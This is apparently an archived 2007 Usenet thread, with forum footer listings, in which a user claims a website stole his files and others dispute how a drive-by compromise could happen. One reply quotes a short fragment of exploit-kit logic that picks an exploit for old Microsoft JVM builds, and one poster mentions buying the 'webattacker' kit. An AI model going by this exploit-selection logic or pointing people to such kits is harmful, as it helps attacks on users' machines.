On 25 May, 16:53, "Dag Sunde" <m...@dagsunde.comwrote:
navti wrote:
On May 25, 1:57 pm, "Dag Sunde" <m...@dagsunde.comwrote:
navti wrote:
On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.netwrote:
navti said:
>>>>The only way a webserver can compromise a client in the way you
described is eiter:
1.) A signed Java Applet where you explicitly have ansvered
"Yes" when asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have
ansvered "Yes" when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings
of your browser
wide-open.
>>>>Neither PHP nor JavaScript is able to access your files.
>>>what about drive by downloads where the client simply has to
visit a malicious web site to be compromised ? you know that the
client doesnt have to do anything to give up his data to a
malicious website so why are you denying it ?
>>You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?
>>--
>it happened to me on windoze which is why i scrapped windoze for mac
os x and linux.
>you guys are seriously trying to tell me yhou have never heard of
these kind of attacks ?
>i suggest you visit some security websites to see how prevalent they
are and how easy they seem to be to execute.
The only way that can happen is in scenario 3.) above when using IE.
And then only when someone have manually turned off the default
security settings in IE first.
I suggest you post a link to this "Magic" malicious site...
--
Dag.
there are thousands of sites which can harm your computer.
most are porn etc
I promise not to blush... Post a harmful link!
tell me you are pulling my leg ?
No, definitely not!
you have never heard of webattacker, xss etc etc
Of course I have, but those is only harmful to those that have opened
up the default security settings of their browsers... javaScript alone
can't do any harm to my computer. And neither can Applets or ActiveX
controls without me giving them explicit permission to do so.
This thread started with you claiming that an "enemy's" web-site
managed to access your computer
<quote>
>i visited a website of an enemy and he not only did a listing of my
>local files he also copied them to his server. im pretty certqain he
>was using javascript.
</quote>
Post a link to this site. It is in everybody's interest that you do so.
--
Dag.
Dag
this happened a while ago and the site is long gone,
you must know that these sites only stay online for a few days before
they are pulled down,
i am interested to know how he got hold of my files.
he pointed me to some of his websites and i went and had a look, i
clicked a few links and hey presto my hard drive starts churning,
by the time i realised what had happened he had nicked my files. i
know this because he got my telephone numebr and email and home
address from my resume which was on my desktop . i certainly never
sent it to him,.
this has happened to me since and i have wiped windows off my
remaining PC and installed linux.
i got rid of my ibm thinkpad and got myself a powerbook.
i am now rid of the virus called windows.,
We both know this happens all the time on windows so why are you
denying it ?
MikeB wrote:
"Dag Sunde" <me@dagsunde.comwrote in message
news:46**********************@news.wineasy.se...
>navti wrote:
>>>>
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
Prove it!
Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!
Aren't you starting to get an image of a short squat fellow domiciled beneath
an over water conveyance structure...
I know, I know!
A troll!
What do I win!?
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.comwrote:
MikeB wrote:
"Dag Sunde" <m...@dagsunde.comwrote in message
news:46**********************@news.wineasy.se...
navti wrote:
>what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
Prove it!
Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!
Aren't you starting to get an image of a short squat fellow domiciled beneath
an over water conveyance structure...
I know, I know!
A troll!
What do I win!?
grow up will you.
i want to know how it was done.
i guess i will have to buy webattacker to find out.
navti wrote:
On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.comwrote:
>MikeB wrote:
>>"Dag Sunde" <m...@dagsunde.comwrote in message
news:46**********************@news.wineasy.se. ..
navti wrote:
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
Prove it!
Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!
Aren't you starting to get an image of a short squat fellow domiciled beneath
an over water conveyance structure...
I know, I know!
A troll!
What do I win!?
grow up will you.
i want to know how it was done.
i guess i will have to buy webattacker to find out.
Don't even start with me. It just so happens I trashed a response to
you, basically stating this thread and your responses in it were crap.
And funny, one of the things in it was, "And if you're just fishing for
exploit code, you'd have much better luck Googling."
And for the record... no is denying what you are saying. What people
are denying is that you were running as secure as humanly possible
installation of Windows. It is evident by your browser hijacking
session that you were not operating under a secure premise. That says
something about you, not about anyone else in this thread.
You'll forgive us if we think you are troll. 8-|
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
On 25 May, 17:54, -Lost <maventheextrawo...@techie.comwrote:
navti wrote:
On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.comwrote:
MikeB wrote:
"Dag Sunde" <m...@dagsunde.comwrote in message
news:46**********************@news.wineasy.se. ..
navti wrote:
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
Prove it!
Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!
Aren't you starting to get an image of a short squat fellow domiciled beneath
an over water conveyance structure...
I know, I know!
A troll!
What do I win!?
grow up will you.
i want to know how it was done.
i guess i will have to buy webattacker to find out.
Don't even start with me.
start what ?
navti wrote:
On 25 May, 17:54, -Lost <maventheextrawo...@techie.comwrote:
>navti wrote:
>>On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.comwrote:
MikeB wrote:
"Dag Sunde" <m...@dagsunde.comwrote in message
news:46**********************@news.wineasy.se. ..
>navti wrote:
>>what about drive by downloads where the client simply has to
>>visit a malicious web site to be compromised ? you know that
>>the client doesnt have to do anything to give up his data to a
>>malicious website so why are you denying it ?
>Prove it!
>Prove it by posting a link to such a site, and I'll go there
>myself with all my different browsers to see if you are right!
Aren't you starting to get an image of a short squat fellow
domiciled beneath an over water conveyance structure...
I know, I know!
>>>A troll!
>>>What do I win!?
>>grow up will you.
>>i want to know how it was done.
>>i guess i will have to buy webattacker to find out.
Don't even start with me.
start what ?
Trolling...
You won't hear more from me either.
--
Dag.
navti wrote:
On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.comwrote:
>On May 25, 7:39 am, navti <nav...@gmail.comwrote:
>>On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
...
>> if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
The (dreaded) MSVM.
If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's.[snip]
he stole my files . i know this for a fact.
why would you think it was otherwise ? have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.
my mistake is thinking javascript was enough . obviously it was a
combination of javascript, java, activex , php , xml etc etc
It looks to me - and I could be wrong - that it pushes a buffer overflow
to the browser to start existing code. I'd have to pull it to bits to be
sure what its doing, but it seems it is using Javascript to build a page
existing code can read so that it knows what exploit to run.
If that's right - and as I say, it may not be - then it means that you
would have earlier agreed to let that code onto your machine either
explicitly or by having very low security settings on your browser. Low
enough that it can pretty much only be IE. It then exploits existing
software on your machine, such as Norton, McAfee and the old MS JVM
apparently.
Though I agree with the others so far, unlike them, I do think that once
it has got that far, it is quite possible to steal your files. I'd need
to see the code it on your system, but this kind of apparent "drive by"
as you call it is not really what you think. Its a double-attack; you
get apparently "safe" code on your system, later on you start it from a
site that doesn't carry any invasive code - in this case, a bit of
Javascript.
At that point, the code sitting quietly on your machine leaps into
action, does its thing and shuts up. Its a trojan, pure and simple. The
Javascript just exploits IE to start the trojan and it is the trojan,
not the Javascript, that does the damage. WIth luck, the person that
gets hit is daft enough to think its that one website that causes the
problem, so doesn't realise the *real* problem is still sat on his
computer - the trojan.
On May 25, 5:02 pm, navti <nav...@gmail.comwrote:
On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.comwrote:
On May 25, 7:39 am, navti <nav...@gmail.comwrote:
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time.
....
If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Javaapplet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.
....
he stole my files . i know this for a fact.
why would you think it was otherwise ?
Who? I specifically stated (requoting)
If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. ...
>...have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
See above 'it is possibe'.
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.
Only an ignoramus would quote and comment on replies
they had apparently not read, or not understood. Try
not being an ingoramus, next time.
Andrew T.
navti wrote:
On May 25, 11:20 am, "rf" <r...@invalid.comwrote:
>If your system is so insecure that this can happen then you should unplug
your system from the internet. It's unsafe.
i did, it was called windows and i replaced it with a secure system
called os x,
OS X is not inherently any more secure than Win XP. It is simply that
hackers spend far more of their time trying to break into Windows than
other platforms.
On Tue, 29 May 2007 09:56:14 -0400, Christopher Barber wrote:
navti wrote:
>On May 25, 11:20 am, "rf" <r...@invalid.comwrote:
>>If your system is so insecure that this can happen then you should
unplug your system from the internet. It's unsafe.
i did, it was called windows and i replaced it with a secure system
called os x,
OS X is not inherently any more secure than Win XP. It is simply that
hackers spend far more of their time trying to break into Windows than
other platforms.
....and if people keep saying that enough it will some day become true?
People spend more time writing malicious code for Windows than any other
OS because any idiot can write a debilitating virus or worm for Windows.
So much so that a few of the most destructive worms written for Windows
were accidentally as destructive as they turned out to be. (see: iloveyou
virus... which wasn't a virus.)
The current security hole in Open Office is the closest thing there's ever
been to an ease of use windows exploit. But I have no doubt that hole will
be closed before there's ever an exploit in the wild.
Ivan Marsh wrote:
On Tue, 29 May 2007 09:56:14 -0400, Christopher Barber wrote:
>navti wrote:
>>On May 25, 11:20 am, "rf" <r...@invalid.comwrote:
If your system is so insecure that this can happen then you should
unplug your system from the internet. It's unsafe.
i did, it was called windows and i replaced it with a secure system
called os x,
OS X is not inherently any more secure than Win XP. It is simply that
hackers spend far more of their time trying to break into Windows than
other platforms.
...and if people keep saying that enough it will some day become true?
People spend more time writing malicious code for Windows than any other
OS because any idiot can write a debilitating virus or worm for Windows.
So much so that a few of the most destructive worms written for Windows
were accidentally as destructive as they turned out to be. (see: iloveyou
virus... which wasn't a virus.)
The current security hole in Open Office is the closest thing there's ever
been to an ease of use windows exploit. But I have no doubt that hole will
be closed before there's ever an exploit in the wild.
Which version and where is it already listed as an exploit?
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
On Wed, 30 May 2007 01:02:15 -0400, -Lost wrote:
Ivan Marsh wrote:
>On Tue, 29 May 2007 09:56:14 -0400, Christopher Barber wrote:
>>navti wrote:
On May 25, 11:20 am, "rf" <r...@invalid.comwrote:
If your system is so insecure that this can happen then you should
unplug your system from the internet. It's unsafe.
i did, it was called windows and i replaced it with a secure system
called os x,
OS X is not inherently any more secure than Win XP. It is simply that
hackers spend far more of their time trying to break into Windows than
other platforms.
...and if people keep saying that enough it will some day become true?
People spend more time writing malicious code for Windows than any
other OS because any idiot can write a debilitating virus or worm for
Windows. So much so that a few of the most destructive worms written
for Windows were accidentally as destructive as they turned out to be.
(see: iloveyou virus... which wasn't a virus.)
The current security hole in Open Office is the closest thing there's
ever been to an ease of use windows exploit. But I have no doubt that
hole will be closed before there's ever an exploit in the wild.
Which version and where is it already listed as an exploit?
I said "closest thing" to an exploit... it's only a proof of concept. http://apcmag.com/6162/first_openoffice_virus_emerges This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: CHIN |
last post by:
Hi all.. here s my problem ( maybe some of you saw me on other groups, but i
cant find the solution !! )
I have to upload a file to an external site, so, i made a .vbs file , that
logins to...
|
by: DavidNorep |
last post by:
I do not know PHP, consider to write a CGI with this technology and
have the following question.
Is it possible to invoke a PHP script and let it endlessly wait for
requests from a website (a...
|
by: Hystou |
last post by:
There are some requirements for setting up RAID:
1. The motherboard and BIOS support RAID configuration.
2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers,...
| | |
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
|
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The...
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated ...
| |
